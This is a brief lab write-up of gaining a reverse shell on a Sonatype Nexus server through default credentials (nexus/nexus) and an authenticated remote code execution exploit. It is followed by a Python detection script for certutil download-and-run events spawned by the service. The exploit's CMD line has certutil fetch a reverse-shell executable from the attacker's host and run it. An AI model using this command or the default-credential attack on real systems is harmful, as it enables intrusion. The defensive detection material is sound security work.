BillyBoss

Exploitation


Last updated 2 years ago

With authentication I was able to figure out the password for the login page of the Sonatype Nexus repo manager. The user was nexus and so was the password.

#!/usr/bin/python3

import sys
import base64
import requests

URL='http://192.168.143.61:8081'
CMD='cmd.exe /c certutil -urlcache -f http://192.168.49.143:80/lyethar-shell-reverse.exe lyethar-shell-reverse.exe && lyethar-shell-reverse.exe'
USERNAME='nexus'
PASSWORD='nexus'

With a little modification I generated my payload and made the exploit reach out to me and ultimately get a reverse shell.

Reference: Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated), Exploit Database
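On the defending side, the CMD value above leaves a recognisable trace: certutil -urlcache fetching a binary and running it, launched by the Nexus service process. The following detection logic is an added example, not part of the original write-up; the event field names, the sample events and the assumption that Nexus runs under java.exe are constructed for illustration.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 style fields); all values made up.
SAMPLE_EVENTS = [
    {"parent": r"C:\nexus\jre\bin\java.exe",
     "cmdline": "cmd.exe /c certutil -urlcache -f http://192.0.2.10:80/a.exe a.exe && a.exe"},
    {"parent": r"C:\Windows\System32\mmc.exe",
     "cmdline": r"certutil.exe -verify C:\certs\server.cer"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "CertUtil /URLCache /f https://example.test/tool.zip tool.zip"},
    {"parent": r"C:\nexus\jre\bin\java.exe",
     "cmdline": "cmd.exe /c whoami"},
]

CERTUTIL = re.compile(r"\bcertutil(\.exe)?\b", re.I)
URLCACHE = re.compile(r"[-/]urlcache\b", re.I)
REMOTE_URL = re.compile(r"\b(?:https?|ftp)://[^\s\"']+", re.I)
SHELL = re.compile(r"\b(?:cmd|powershell|pwsh)(?:\.exe)?\b", re.I)
CHAIN = re.compile(r"\s&{1,2}\s")
# Assumption: the repository manager runs as a Java process on the host.
SERVICE_PARENTS = {"java.exe", "javaw.exe"}


def score_event(event):
    """Return (severity, reasons) for one process-creation event."""
    cmd = event["cmdline"]
    parent = event["parent"].lower().rsplit("\\", 1)[-1]
    reasons = []
    url = REMOTE_URL.search(cmd)
    download = bool(CERTUTIL.search(cmd) and URLCACHE.search(cmd) and url)
    if download:
        reasons.append("certutil -urlcache fetch from " + url.group(0))
        if CHAIN.search(cmd):
            reasons.append("download chained to a further command")
    from_service = parent in SERVICE_PARENTS and bool(SHELL.search(cmd) or CERTUTIL.search(cmd))
    if from_service:
        reasons.append("shell or certutil spawned by " + parent)
    if download and from_service:
        return "high", reasons
    return ("medium" if reasons else "none"), reasons


def triage(events):
    return [(score_event(e)[0], e["cmdline"]) for e in events]


if __name__ == "__main__":
    for severity, cmdline in triage(SAMPLE_EVENTS):
        print(f"{severity:6} {cmdline}")
```

The default nexus/nexus login is what made the authenticated exploit usable here, so changing that credential removes the precondition; the rule above covers the case where it was missed.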